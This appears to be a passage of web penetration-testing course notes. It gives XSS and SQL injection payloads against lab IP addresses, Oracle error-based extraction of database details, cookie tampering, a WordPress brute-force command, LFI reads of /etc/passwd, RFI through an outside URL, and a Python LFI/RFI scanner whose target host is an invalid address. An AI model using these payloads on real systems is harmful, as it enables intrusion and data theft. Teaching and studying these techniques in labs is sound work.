3241 | Step 1: Ask yourself the 3 questions per page of the site. | |
3242 | ||
3243 | Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter) | |
3244 | ||
3245 | Step 3: When you load your fuzz strings - use the following decision tree | |
3246 | ||
3247 | - Are the fuzz strings causing a default error message (example 404)? | |
3248 | - If this is the case then it is most likely NOT vulnerable | |
3249 | ||
3250 | - Are the fuzz strings causing a WAF or LB custom error message? | |
3251 | - If this is the case then you need to find an encoding method to bypass | |
3252 | ||
3253 | ||
3254 | - Are the fuzz strings causing an error message that discloses the backend type? | |
3255 | - If yes, then identify DB type and find correct syntax to successfully exploit | |
3256 | - Some example strings that I use are: | |
3257 | ' | |
3258 | " | |
3259 | () <----- Take the parameter value and put it in parenthesis | |
3260 | (5-1) <----- See if you can perform an arithmetic function | |
3261 | ||
3262 | ||
3263 | - Are the fuzz strings rendering executable code? | |
3264 | - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc | |
3265 | - Some example strings that I use are: | |
3266 | <b>hello</b> | |
3267 | <u>hello</u> | |
3268 | <script>alert(123);</script> | |
3269 | <script>alert(xss);</script> | |
3270 | <script>alert('xss');</script> | |
3271 | <script>alert("xss");</script> | |
3272 | ||
3273 | ||
3274 | ||
3275 | ||
3276 | ||
3277 | ||
3278 | ############################ | |
3279 | # Trading Web App with WAF # | |
3280 | # http://54.213.131.105 # | |
3281 | ############################ | |
3282 | ||
3283 | ||
3284 | Try the following in the search box: | |
3285 | <script>alert(123);</script> | |
3286 | <script>alert(123);</script | |
3287 | <script>alert(123) | |
3288 | <script>alert | |
3289 | <script> | |
3290 | <script | |
3291 | <scrip | |
3292 | <scri | |
3293 | <scr | |
3294 | <sc | |
3295 | <s | |
3296 | <p | |
3297 | < | |
3298 | < s | |
3299 | Joe'+OR+1=1;-- | |
3300 | ||
3301 | ||
3302 | Open a new tab in firefox and try this: | |
3303 | http://54.213.131.105/Searchresult.aspx?%u003cscript>prompt(123)%u003c/script>=ScriptName | |
3304 | ||
3305 | ||
3306 | xss_upload.txt (Upload Bulk Order) | |
3307 | <script>alert(123);</script> | |
3308 | ||
3309 | ||
3310 | Login Box: | |
3311 | ||
3312 | ' or 1=1 or ''=' | |
3313 | anything | |
3314 | ||
3315 | ||
3316 | ||
3317 | Tamper Data: (notice 2 session IDs) | |
3318 | ||
3319 | AcmeTrading=a4b796687b846dd4a34931d708c62b49; SessionID is md5 | |
3320 | IsAdmin=yes; | |
3321 | ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45 | |
3322 | ||
3323 | ||
3324 | ||
3325 | Profile - Detail (tamper data) | |
3326 | Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n | |
3327 | joe|set | |
3328 | ||
3329 | ||
3330 | ||
3331 | ||
3332 | ||
3333 | ||
3334 | ||
3335 | ########################################################### | |
3336 | # Attacking an Oracle/JSP based WebApp with SQL Injection # | |
3337 | ########################################################### | |
3338 | ||
3339 | ||
3340 | ||
3341 | ||
3342 | ||
3343 | http://54.69.156.253:8081/bookcompany/ | |
3344 | ||
3345 | ||
3346 | user: a' OR 'a'='a | |
3347 | pass: a' OR 'a'='a | |
3348 | ||
3349 | ||
3350 | ||
3351 | ||
3352 | ||
3353 | ||
3354 | ||
3355 | http://54.69.156.253:8081/bookcompany/author.jsp?id=111 | |
3356 | ||
3357 | ||
3358 | [ Search by Username ] Joe' OR 'a'='a | |
3359 | ||
3360 | ||
3361 | ||
3362 | ||
3363 | ||
3364 | ||
3365 | ||
3366 | ||
3367 | ||
3368 | ||
3369 | ||
3370 | ||
3371 | http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1 | |
3372 | ||
3373 | ||
3374 | ||
3375 | http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' OR '1'='1 | |
3376 | ||
3377 | ||
3378 | ||
3379 | ||
3380 | ||
3381 | ||
3382 | ||
3383 | ||
3384 | ||
3385 | ||
3386 | ||
3387 | ||
3388 | ||
3389 | ||
3390 | ||
3391 | http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))-- | |
3392 | ||
3393 | ||
3394 | Host is running: | |
3395 | ||
3396 | ||
3397 | ||
3398 | ||
3399 | ||
3400 | http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT user FROM dual))-- | |
3401 | ||
3402 | User is: | |
3403 | ||
3404 | ||
3405 | ||
3406 | ||
3407 | ||
3408 | http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name))-- | |
3409 | ||
3410 | Current database is: | |
3412 | ||
3413 | ||
3414 | ||
3415 | ||
3416 | ###################### | |
3417 | # Lesson 27: Web App # | |
3418 | ###################### | |
3419 | vi wpbruteforcer.py | |
3420 | ||
3421 | ||
3422 | python wpbruteforcer.py -t strategicsec.com -u j0e -w list.txt | |
3423 | ||
3424 | ||
3425 | ||
3426 | - Here is an example of an LFI | |
3427 | - Open this page in Firefox: | |
3428 | http://54.172.112.249/showfile.php?filename=contactus.txt | |
3429 | ||
3430 | - Notice the page name (showfile.php), the parameter name (filename), and the file name (contactus.txt). | |
3431 | - Here you see a direct reference to a file on the local filesystem of the victim machine. | |
3432 | - You can attack this by doing the following: | |
3433 | http://54.172.112.249/showfile.php?filename=/etc/passwd | |
3434 | ||
3435 | - This is an example of a Local File Include (LFI). To change this attack into a Remote File Include (RFI) you need some content from | |
3436 | - somewhere else on the Internet. Here is an example of a text file on the web: | |
3437 | http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt | |
3438 | ||
3439 | - Now we can attack the target via RFI like this: | |
3440 | http://54.172.112.249/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt | |
3441 | ||
3442 | ||
3443 | - Now let's see if we can write some code to do this for us: | |
3444 | ||
3445 | vi LFI-RFI.py | |
3446 | ||
3447 | ||
3448 | ||
#!/usr/bin/env python
# Checks one PHP page for a Local File Include (directory traversal up to
# etc/passwd) and then for a Remote File Include (pointing the same parameter
# at a file hosted elsewhere).  Every probe is a plain GET and the response
# body is searched for a marker string; the first LFI hit stops the search.
print "\n### PHP LFI/RFI Detector ###"
print "### Sean Arries 09/18/09 ###\n"

import urllib2,re,sys


# Page under test.  Everything after the last "=" is replaced by each probe.
# NOTE(review): the host literal here ("554.172.112.249") differs from the
# URL used in the notes above ("54.172.112.249") -- confirm which is intended.
TARGET = "http://554.172.112.249/showfile.php?filename=contactus.txt"
# Remote file used for the RFI probe.  The trailing "?" presumably neutralises
# anything the page appends to the value -- verify against the target page.
RFIVULN = "http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt?"
# Traversal depths 1 .. TravLimit-1 are tried (xrange excludes the upper bound).
TravLimit = 12


def fetch(url):
    """GET *url* and return the response body.

    On urllib2.URLError (which also covers HTTP error statuses) the error is
    printed and the whole script exits with status 0, exactly like the
    inline handling it replaces.
    """
    try:
        return urllib2.urlopen(url).read()
    except urllib2.URLError, e:
        print "$$$ We had an Error:",e
        sys.exit(0)


# The URL up to and including the "=" of the parameter being tested.
base = TARGET.split("=")[0]+"="

print "==> Testing for LFI vulns.."
for depth in xrange(1,TravLimit):
    probe = base + "../"*depth + "etc/passwd"
    body = fetch(probe)
    if re.search("root:x:0:0:",body):  # marker for a readable passwd file
        print "!! ==> LFI Found:",probe
        break  # first hit is enough

print "\n==> Testing for RFI vulns.."
probe = base+RFIVULN
body = fetch(probe)
if re.search("j0e",body):  # marker expected inside the remote file
    print "!! => RFI Found:",probe


print "\nScan Complete\n"